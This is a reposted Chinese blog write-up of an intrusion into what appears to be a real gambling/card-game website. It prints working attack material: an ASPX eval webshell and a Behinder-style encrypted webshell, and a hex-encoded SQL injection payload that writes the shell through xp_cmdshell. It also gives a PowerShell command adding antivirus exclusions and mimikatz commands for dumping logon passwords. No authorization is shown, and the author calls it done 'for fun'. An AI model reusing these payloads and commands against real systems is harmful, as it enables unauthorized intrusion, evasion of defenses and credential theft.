文章总结： 文档记录了针对某棋牌系统的渗透测试过程，发现登录框存在SQL注入漏洞和弱口令问题。通过sqlmap获取数据库权限并启用xp_cmdshell，尝试上传Webshell时遭遇杀软拦截，最终通过免杀技术和冰蝎木马实现持久化控制。过程中涉及内网提权、密码抓取等操作，展示了完整的渗透测试链路与对抗安全防护的实战经验。 综合评分： 78 文章分类： 渗透测试,WEB安全,内网渗透,恶意软件,免杀

http://xxxxxxx/Scripts/jquery-1.10.2.min.js.path.txtd:\网站\后台\scripts\jquery-1.10.2.min.js

sqlmap写不了嗷 使用burp可，接着写个小马

写进去不大对劲草，写了一个.txt这个错误，难道被解析了？

aspx可以写，然后就没有然后

<%@ Page Language="Jscript"%><%Response.Write(eval(Request.Item["z"],"unsafe"));%>
^<%@ Page Language="C#" %^>^<%@Import Namespace="System.Reflection"%^>^<%Session.Add("k","e45e329feb5d925b"); byte[] k = Encoding.Default.GetBytes(Session[0] + ""),c = Request.BinaryRead(Request.ContentLength);Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);%^>%27%3BDECLARE%20%40nsqt%20VARCHAR%288000%29%3BSET%20%40nsqt%3D0x6563686f205e3c25402050616765204c616e67756167653d2243232220255e3e5e3c2540496d706f7274204e616d6573706163653d2253797374656d2e5265666c656374696f6e22255e3e5e3c2553657373696f6e2e41646428226b222c226534356533323966656235643932356222293b20627974655b5d206b203d20456e636f64696e672e44656661756c742e47657442797465732853657373696f6e5b305d202b202222292c63203d20526571756573742e42696e6172795265616428526571756573742e436f6e74656e744c656e677468293b417373656d626c792e4c6f6164286e65772053797374656d2e53656375726974792e43727970746f6772617068792e52696a6e6461656c4d616e6167656428292e437265617465446563727970746f72286b2c206b292e5472616e73666f726d46696e616c426c6f636b28632c20302c20632e4c656e67746829292e437265617465496e7374616e636528225522292e457175616c732874686973293b255e3e203e643a5ccdf8d5be5cbaf3cca85c3131312e61737078%3BEXEC%20master..xp_cmdshell%20%40nsqt--

这里编码要注意

echo ^<%@ Page Language="C#" %^>^<%@Import Namespace="System.Reflection"%^>^<%Session.Add("k","e45e329feb5d925b"); byte[] k = Encoding.Default.GetBytes(Session[0] + ""),c = Request.BinaryRead(Request.ContentLength);Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);%^> >d:\网站\后台\111.aspx

最后换成冰蝎的马过了

权限超级小需要提权，md

真牛逼啊

先换一个目录写马 才看一波杀软

这就不好办了呀，能关吗？当然得试试是把，先登录上数据库看看

powershell -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath "D:\etc-0701\GameServer1"

没过一会就被杀了 草 落地没被杀 在通信过程中无了，说明免杀这条路还是不错，不过我选择上哥斯拉看看

bypassAV

我搞免杀还不行嘛淦

次上线很OK,ok个der没执行几个命令就掉

免杀powershell上线

cmd /c powershell -executionpolicy bypass -File

再N次上线，想抓密码的真难抓啊

提权、哟！直接添加用户连接上去

关掉嗷 明明白白

privilege::debugsekurlsa::logonpasswords

参考原因：https://blog.csdn.net/m0_46622606/article/details/105350970

隔了这么久，今天突然看到一个公众号，想起来是不是因为文章中写的补丁原因，准备尝试一下，现在mimikatz已经更新到了2.2.0版本，还没卸载补丁试了下，直接就可以读到HASH了，原因并不清楚，但是现在算是解决了

成功连接进去，当时我就知道是这个密码猜测和数据库一致但是我硬是连接不进去

结束、整个过程也是搞着玩的，思路很乱，看看就行

Fate师傅TQL！！！

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：安锐信安全攻防实验室 《某棋牌渗透记录》